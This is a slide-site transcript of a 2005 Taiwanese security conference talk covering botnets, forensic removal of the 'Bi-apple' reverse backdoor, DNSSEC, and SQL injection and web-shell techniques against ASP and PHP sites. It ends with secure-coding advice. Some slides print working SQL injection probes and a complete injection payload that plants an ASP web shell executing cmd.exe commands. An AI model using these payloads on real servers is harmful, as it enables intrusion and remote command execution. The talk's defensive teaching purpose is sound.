Wise 2005 conference
This presentation is the property of its rightful owner.
Sponsored Links
1 / 50

WISE 2005 Conference PowerPoint PPT Presentation


  • 63 Views
  • Uploaded on
  • Presentation posted in: General

WISE 2005 Conference. Presented by Erion Lin, Department of Information Management, National Taiwan University. Outline. Introduction Network Security Botnet Forensic Analysis of Reverse Backdoor DNSSEC Net Gap Program Security SQL Injection Security Problems of ASP

Download Presentation

WISE 2005 Conference

An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -

Presentation Transcript


Wise 2005 conference

WISE 2005 Conference

Presented by Erion Lin,

Department of Information Management,

National Taiwan University


Outline

Outline

  • Introduction

  • Network Security

    • Botnet

    • Forensic Analysis of Reverse Backdoor

    • DNSSEC

    • Net Gap

  • Program Security

    • SQL Injection

    • Security Problems of ASP

    • Security Problems of PHP

    • Some Hack Skills

  • Conclusion


Introduction

Introduction


Introduction1

Introduction

  • 2004年爆發多起資訊安全事件

  • 中國大陸駭客入侵總統府網站

  • 大陸網軍對我數位社會的威脅

  • 健保、車籍資料外洩數百萬筆

  • 網路犯罪案件數的大幅度成長


Wise 2005 conference

網路犯罪案件數的大幅度成長


Introduction cont d

Introduction (Cont’d)

  • 2004年10月21日,行政院頒布「各政府機關(構)落實資安事件危機處理具體執行方案,要求「各政府機關(構)對極重要、重要之敏感文件、資料、檔案等之處理,應採取檔案加密方式儲存,並除非常必要之連網外,均兼採實體隔離等防護措施,以防止被侵入破壞、竄改、刪除或未經授權之存取動作」。


Network security

Network Security


Botnet

Botnet

Zombie3

Zombie2

Zombie4

Zombie1

Zombie5

Internet

Horn

Attack

Hacker


Bi apple backdoor initial state

rabbi.bi-apple.net

Bi-apple Backdoor─Initial State

rabbi.bi-apple.net

127.0.0.1

Victim

Target Server

Zombie3

Zombie2

Zombie1

Intranet

Internet

Firewall

Bi-apple DNS Server

Router

DMZ

DNS Server

Hacker


Backdoor active state

rabbi.bi-apple.net

rabbi.bi-apple.net

61.221.104.181

Backdoor Active State

61.221.104.181

rabbi.bi-apple.net

61.221.104.181

Victim

Target Server

Zombie3

Zombie2

Zombie1

Intranet

Internet

Firewall

Bi-apple DNS Server

Router

DMZ

DNS Server

Hacker


Backdoor active state cont d

Attack

Remote Control

Syn from Victim 61.221.104.181:80

Remote Control

Backdoor Active State(Cont’d)

rabbi.bi-apple.net

61.221.104.181

61.221.104.181

Victim

Target Server

Zombie3

Zombie2

Zombie1

Intranet

Internet

Firewall

Bi-apple DNS Server

Router

DMZ

DNS Server

Hacker


Feature of bi apple backdoor

Feature of Bi-Apple Backdoor

  • Hard to Detect

  • Reverse Backdoor

  • Easy to Change the Zombie


Digital forensic environment

Digital Forensic Environment


Digital forensic analysis

Digital Forensic Analysis

  • On-Line Analysis

  • Off-Line Analysis


On line analysis

On-Line Analysis

  • Emergency Recovery

  • Find Out the Reason


On line analysis steps

On-Line Analysis Steps

  • Remove Process

  • Remove File and Registry

  • Reboot


Step1 check process explorer

Step1:Check Process Explorer


Step2 check autoruns

Step2:Check Autoruns


Step2 check autoruns1

Step2:Check Autoruns


Step3 check tcpview

Step3:Check TCPView


Step4 check file

Step4:Check File


Step4 check file1

Step4:Check File


Step5 check dll

Step5:Check DLL


Step6 reboot

Step6:Reboot


Step7 check process explorer

Step7:Check Process Explorer


Step8 check sniffer

Step8:Check Sniffer


Step9 stop running process

Step9:Stop Running Process

  • explorer.exe

  • IEXPLORE.exe


Step10 delete malicious registry

Step10:Delete Malicious Registry

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B49DA3DF-E569-423d-BDEA-8F89128E8107}

  • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{2E8A6CF6-3500-4A7D-9F54-69CD76D367D2}


Step11 reboot

Step11:Reboot

  • Check System Activities Again

  • Check Network Activities Again


Normal dns

Fake DNS Message

DNS Message

Accepted

Accepted

Normal DNS

Internet

Hacker

DNS Administrator

DNS Server


Dnssec

Fake DNS Message

DNS Message

Accepted

Rejected

DNSSEC

Internet

Hacker

DNS Administrator

DNS Server with DNSSEC


Dnssec1

DNSSEC

  • TSIG

    • Secret Key

    • One-Way Hash Function

  • SIG0

    • Public Key


Net gap

Malicious TCP/TP Packet

Processing Packet

Normal TCP/IP Packet

Net Gap

Internet

Firewall

Net Gap1

Router

Net Gap2

Intranet


Net gap cont d

Net Gap(Cont’d)

  • Net Gap1:Deconstruct Packets

  • Net Gap2:Reconstruct Packets


Program security

Program Security


Sql injection

SQL Injection

  • The attacker can execute arbitrary SQL queries AND/OR commands on the backend database server through the Web application.


May occur sql injection

May Occur SQL Injection


Sql injection detective skill

SQL Injection Detective Skill

  • Before

    • http://www.ox.com.tw/script.asp?id=2’ IE returns ODBC error record.

  • New Generation

    • http://www.ox.com.tw/script.asp?id=2 and 1=1IE returns normal record.

    • http://www.ox.com.tw/script.asp?id=2 and 1=2IE returns no record.


Security problems of asp

Security Problems of ASP

XP_CMDSHELL

Recovery

xp_cmdshell

Others

(mdb)

(db2)

(Informix)

Upload Area

Install

Web Shell

Add New Account

MS SQL

SQL Injection

DB

Detecting

Echo script

Echo exe file

Firewall

Outbound

testing

MySQL

Directory traversal

File Information Leak

Oracle

FTP

TFTP

網芳

Configure File

Default configure

Install Backdoor

Failure

Success


Hack skills of asp

Hack Skills of ASP

  • ASP SQL Injection

  • MSSQL DB Detection Skill

  • MSSQL Store Procedure Skill

  • ASP WebShell Skill

  • Firewall Outbound Shell

  • One Way Hacking

  • Backdoor Skill


Wise 2005 conference

Security Problems of PHP

Password

Breaking

Program

Others

(mdb)

(db2)

(Informix)

Password File

Upload Area

Load File

Testing

Account and

Password

MS SQL

System

Configuration File

Homepage

Source Code

Program

Defection

SQL Injection

DB

Detection

Install Backdoor

Save File

Testing

MySQL

Directory traversal

File Information Leak

Install Web Shell

Oracle

Create Temp DB

System Section

Writable

Web Section

Writable

Configure File

Default configure

Override

MySQL

Save Backdoor into DB

Failure

Success


Hack skills of php

Hack Skills of PHP

  • Writable Directory Testing Skill

  • File Uploading DB Skill

  • Temp Table Design Dkill

  • PHP WebShell Skill

  • Password Breaking Skill

  • Unix Backdoor Skill


Mssql db detection skill

MSSQL DB Detection Skill

And 1=(Select @@version)

MSSQL

版本資訊


Mssql store procedure skill

MSSQL Store Procedure Skill

  • http://www.ox.com.tw/asp/test.asp?id=294 and 1=(SELECT count(*) FROMmaster.dbo.sysobjectsWHERE xtype = 'X‘AND name= 'xp_cmdshell')

  • 存在xp_cmdshell 的話

    • 會顯示原有新聞資料

  • 不存在xp_cmdshell 的話

    • 會出現錯誤訊息或跳回首頁


Asp webshell skill

ASP WebShell Skill

  • exec sp_makewebtask @outputfile%3d‘c:\inetpub\wwwroot/a.asp',@charset%3dbig5,@query%3d'select ''<%25On Error Resume Next : Set oscript %3d Server.CreateObject("wscript.SHELL") : Set oscriptNet %3d Server.CreateObject("wscript.NETWORK") : Set oFileSys %3d Server.CreateObject("scripting.FileSystemObject") : szCMD %3d Request.Form(".CMD") : If (szCMD <>"")Then : szTempFile %3d "C:\" %26 oFileSys.GetTempName() : Call oscript.Run ("cmd.exe /c " %26 szCMD %26 " > " %26 szTempFile, 0, True) : Set oFile %3d oFilesys.OpenTextFile (szTempFile, 1, False, 0) End If %25> <HTML><BODY><FORM action%3d"<%25%3d Request.ServerVariables("URL")%25>" method%3d"POST"> <input type%3dtext name%3d".CMD" size%3d45 value%3d"<%25%3d szCMD %25>"><input type%3dsubmit value%3d"Run"> </FORM><PRE> <%25 If (IsObject(oFile))Then : On Error Resume Next : Response.Write Server.HTMLEncode(oFile.ReadAll) : oFile.Close : Call oFileSys.DeleteFile(szTempFile, True) : End If%25> </BODY></HTML> '‘ '


Backdoor skills

Backdoor Skills

  • 重用連接埠技術

    • 典型代表後門: 駭客之門

    • 它只有一個dll檔案,通過感染系統檔案啟動自身,被感染的系統檔案大小和日期都不會改變;. 同時採用線程插入技術,本身沒有進程;它本身不開連接埠,而是重用系統進程開的任意一個連接埠,如80,135,139,445等


Wise 2005 conference

Reuse Port

Skill

Firewall(外對內開21,80, 內對外全設限)

2

Web

FTP

IE

3

ftp

BD

1


Conclusion

Conclusion


Conclusion1

Conclusion

  • Software Security Quality

    • Identify all data of user input.

    • Handle meta-character carefully.

    • Don’t give too much error message to user.

    • Try to understand the characteristic of programming language.

    • Avoid using APIs that will call shell directly.

    • Check all application’s default setting

  • New Version of BS7799

    • Different vendors.

  • Information Security Education

  • Management, Information and System


Thanks for your listening

Thanks for Your Listening


  • Login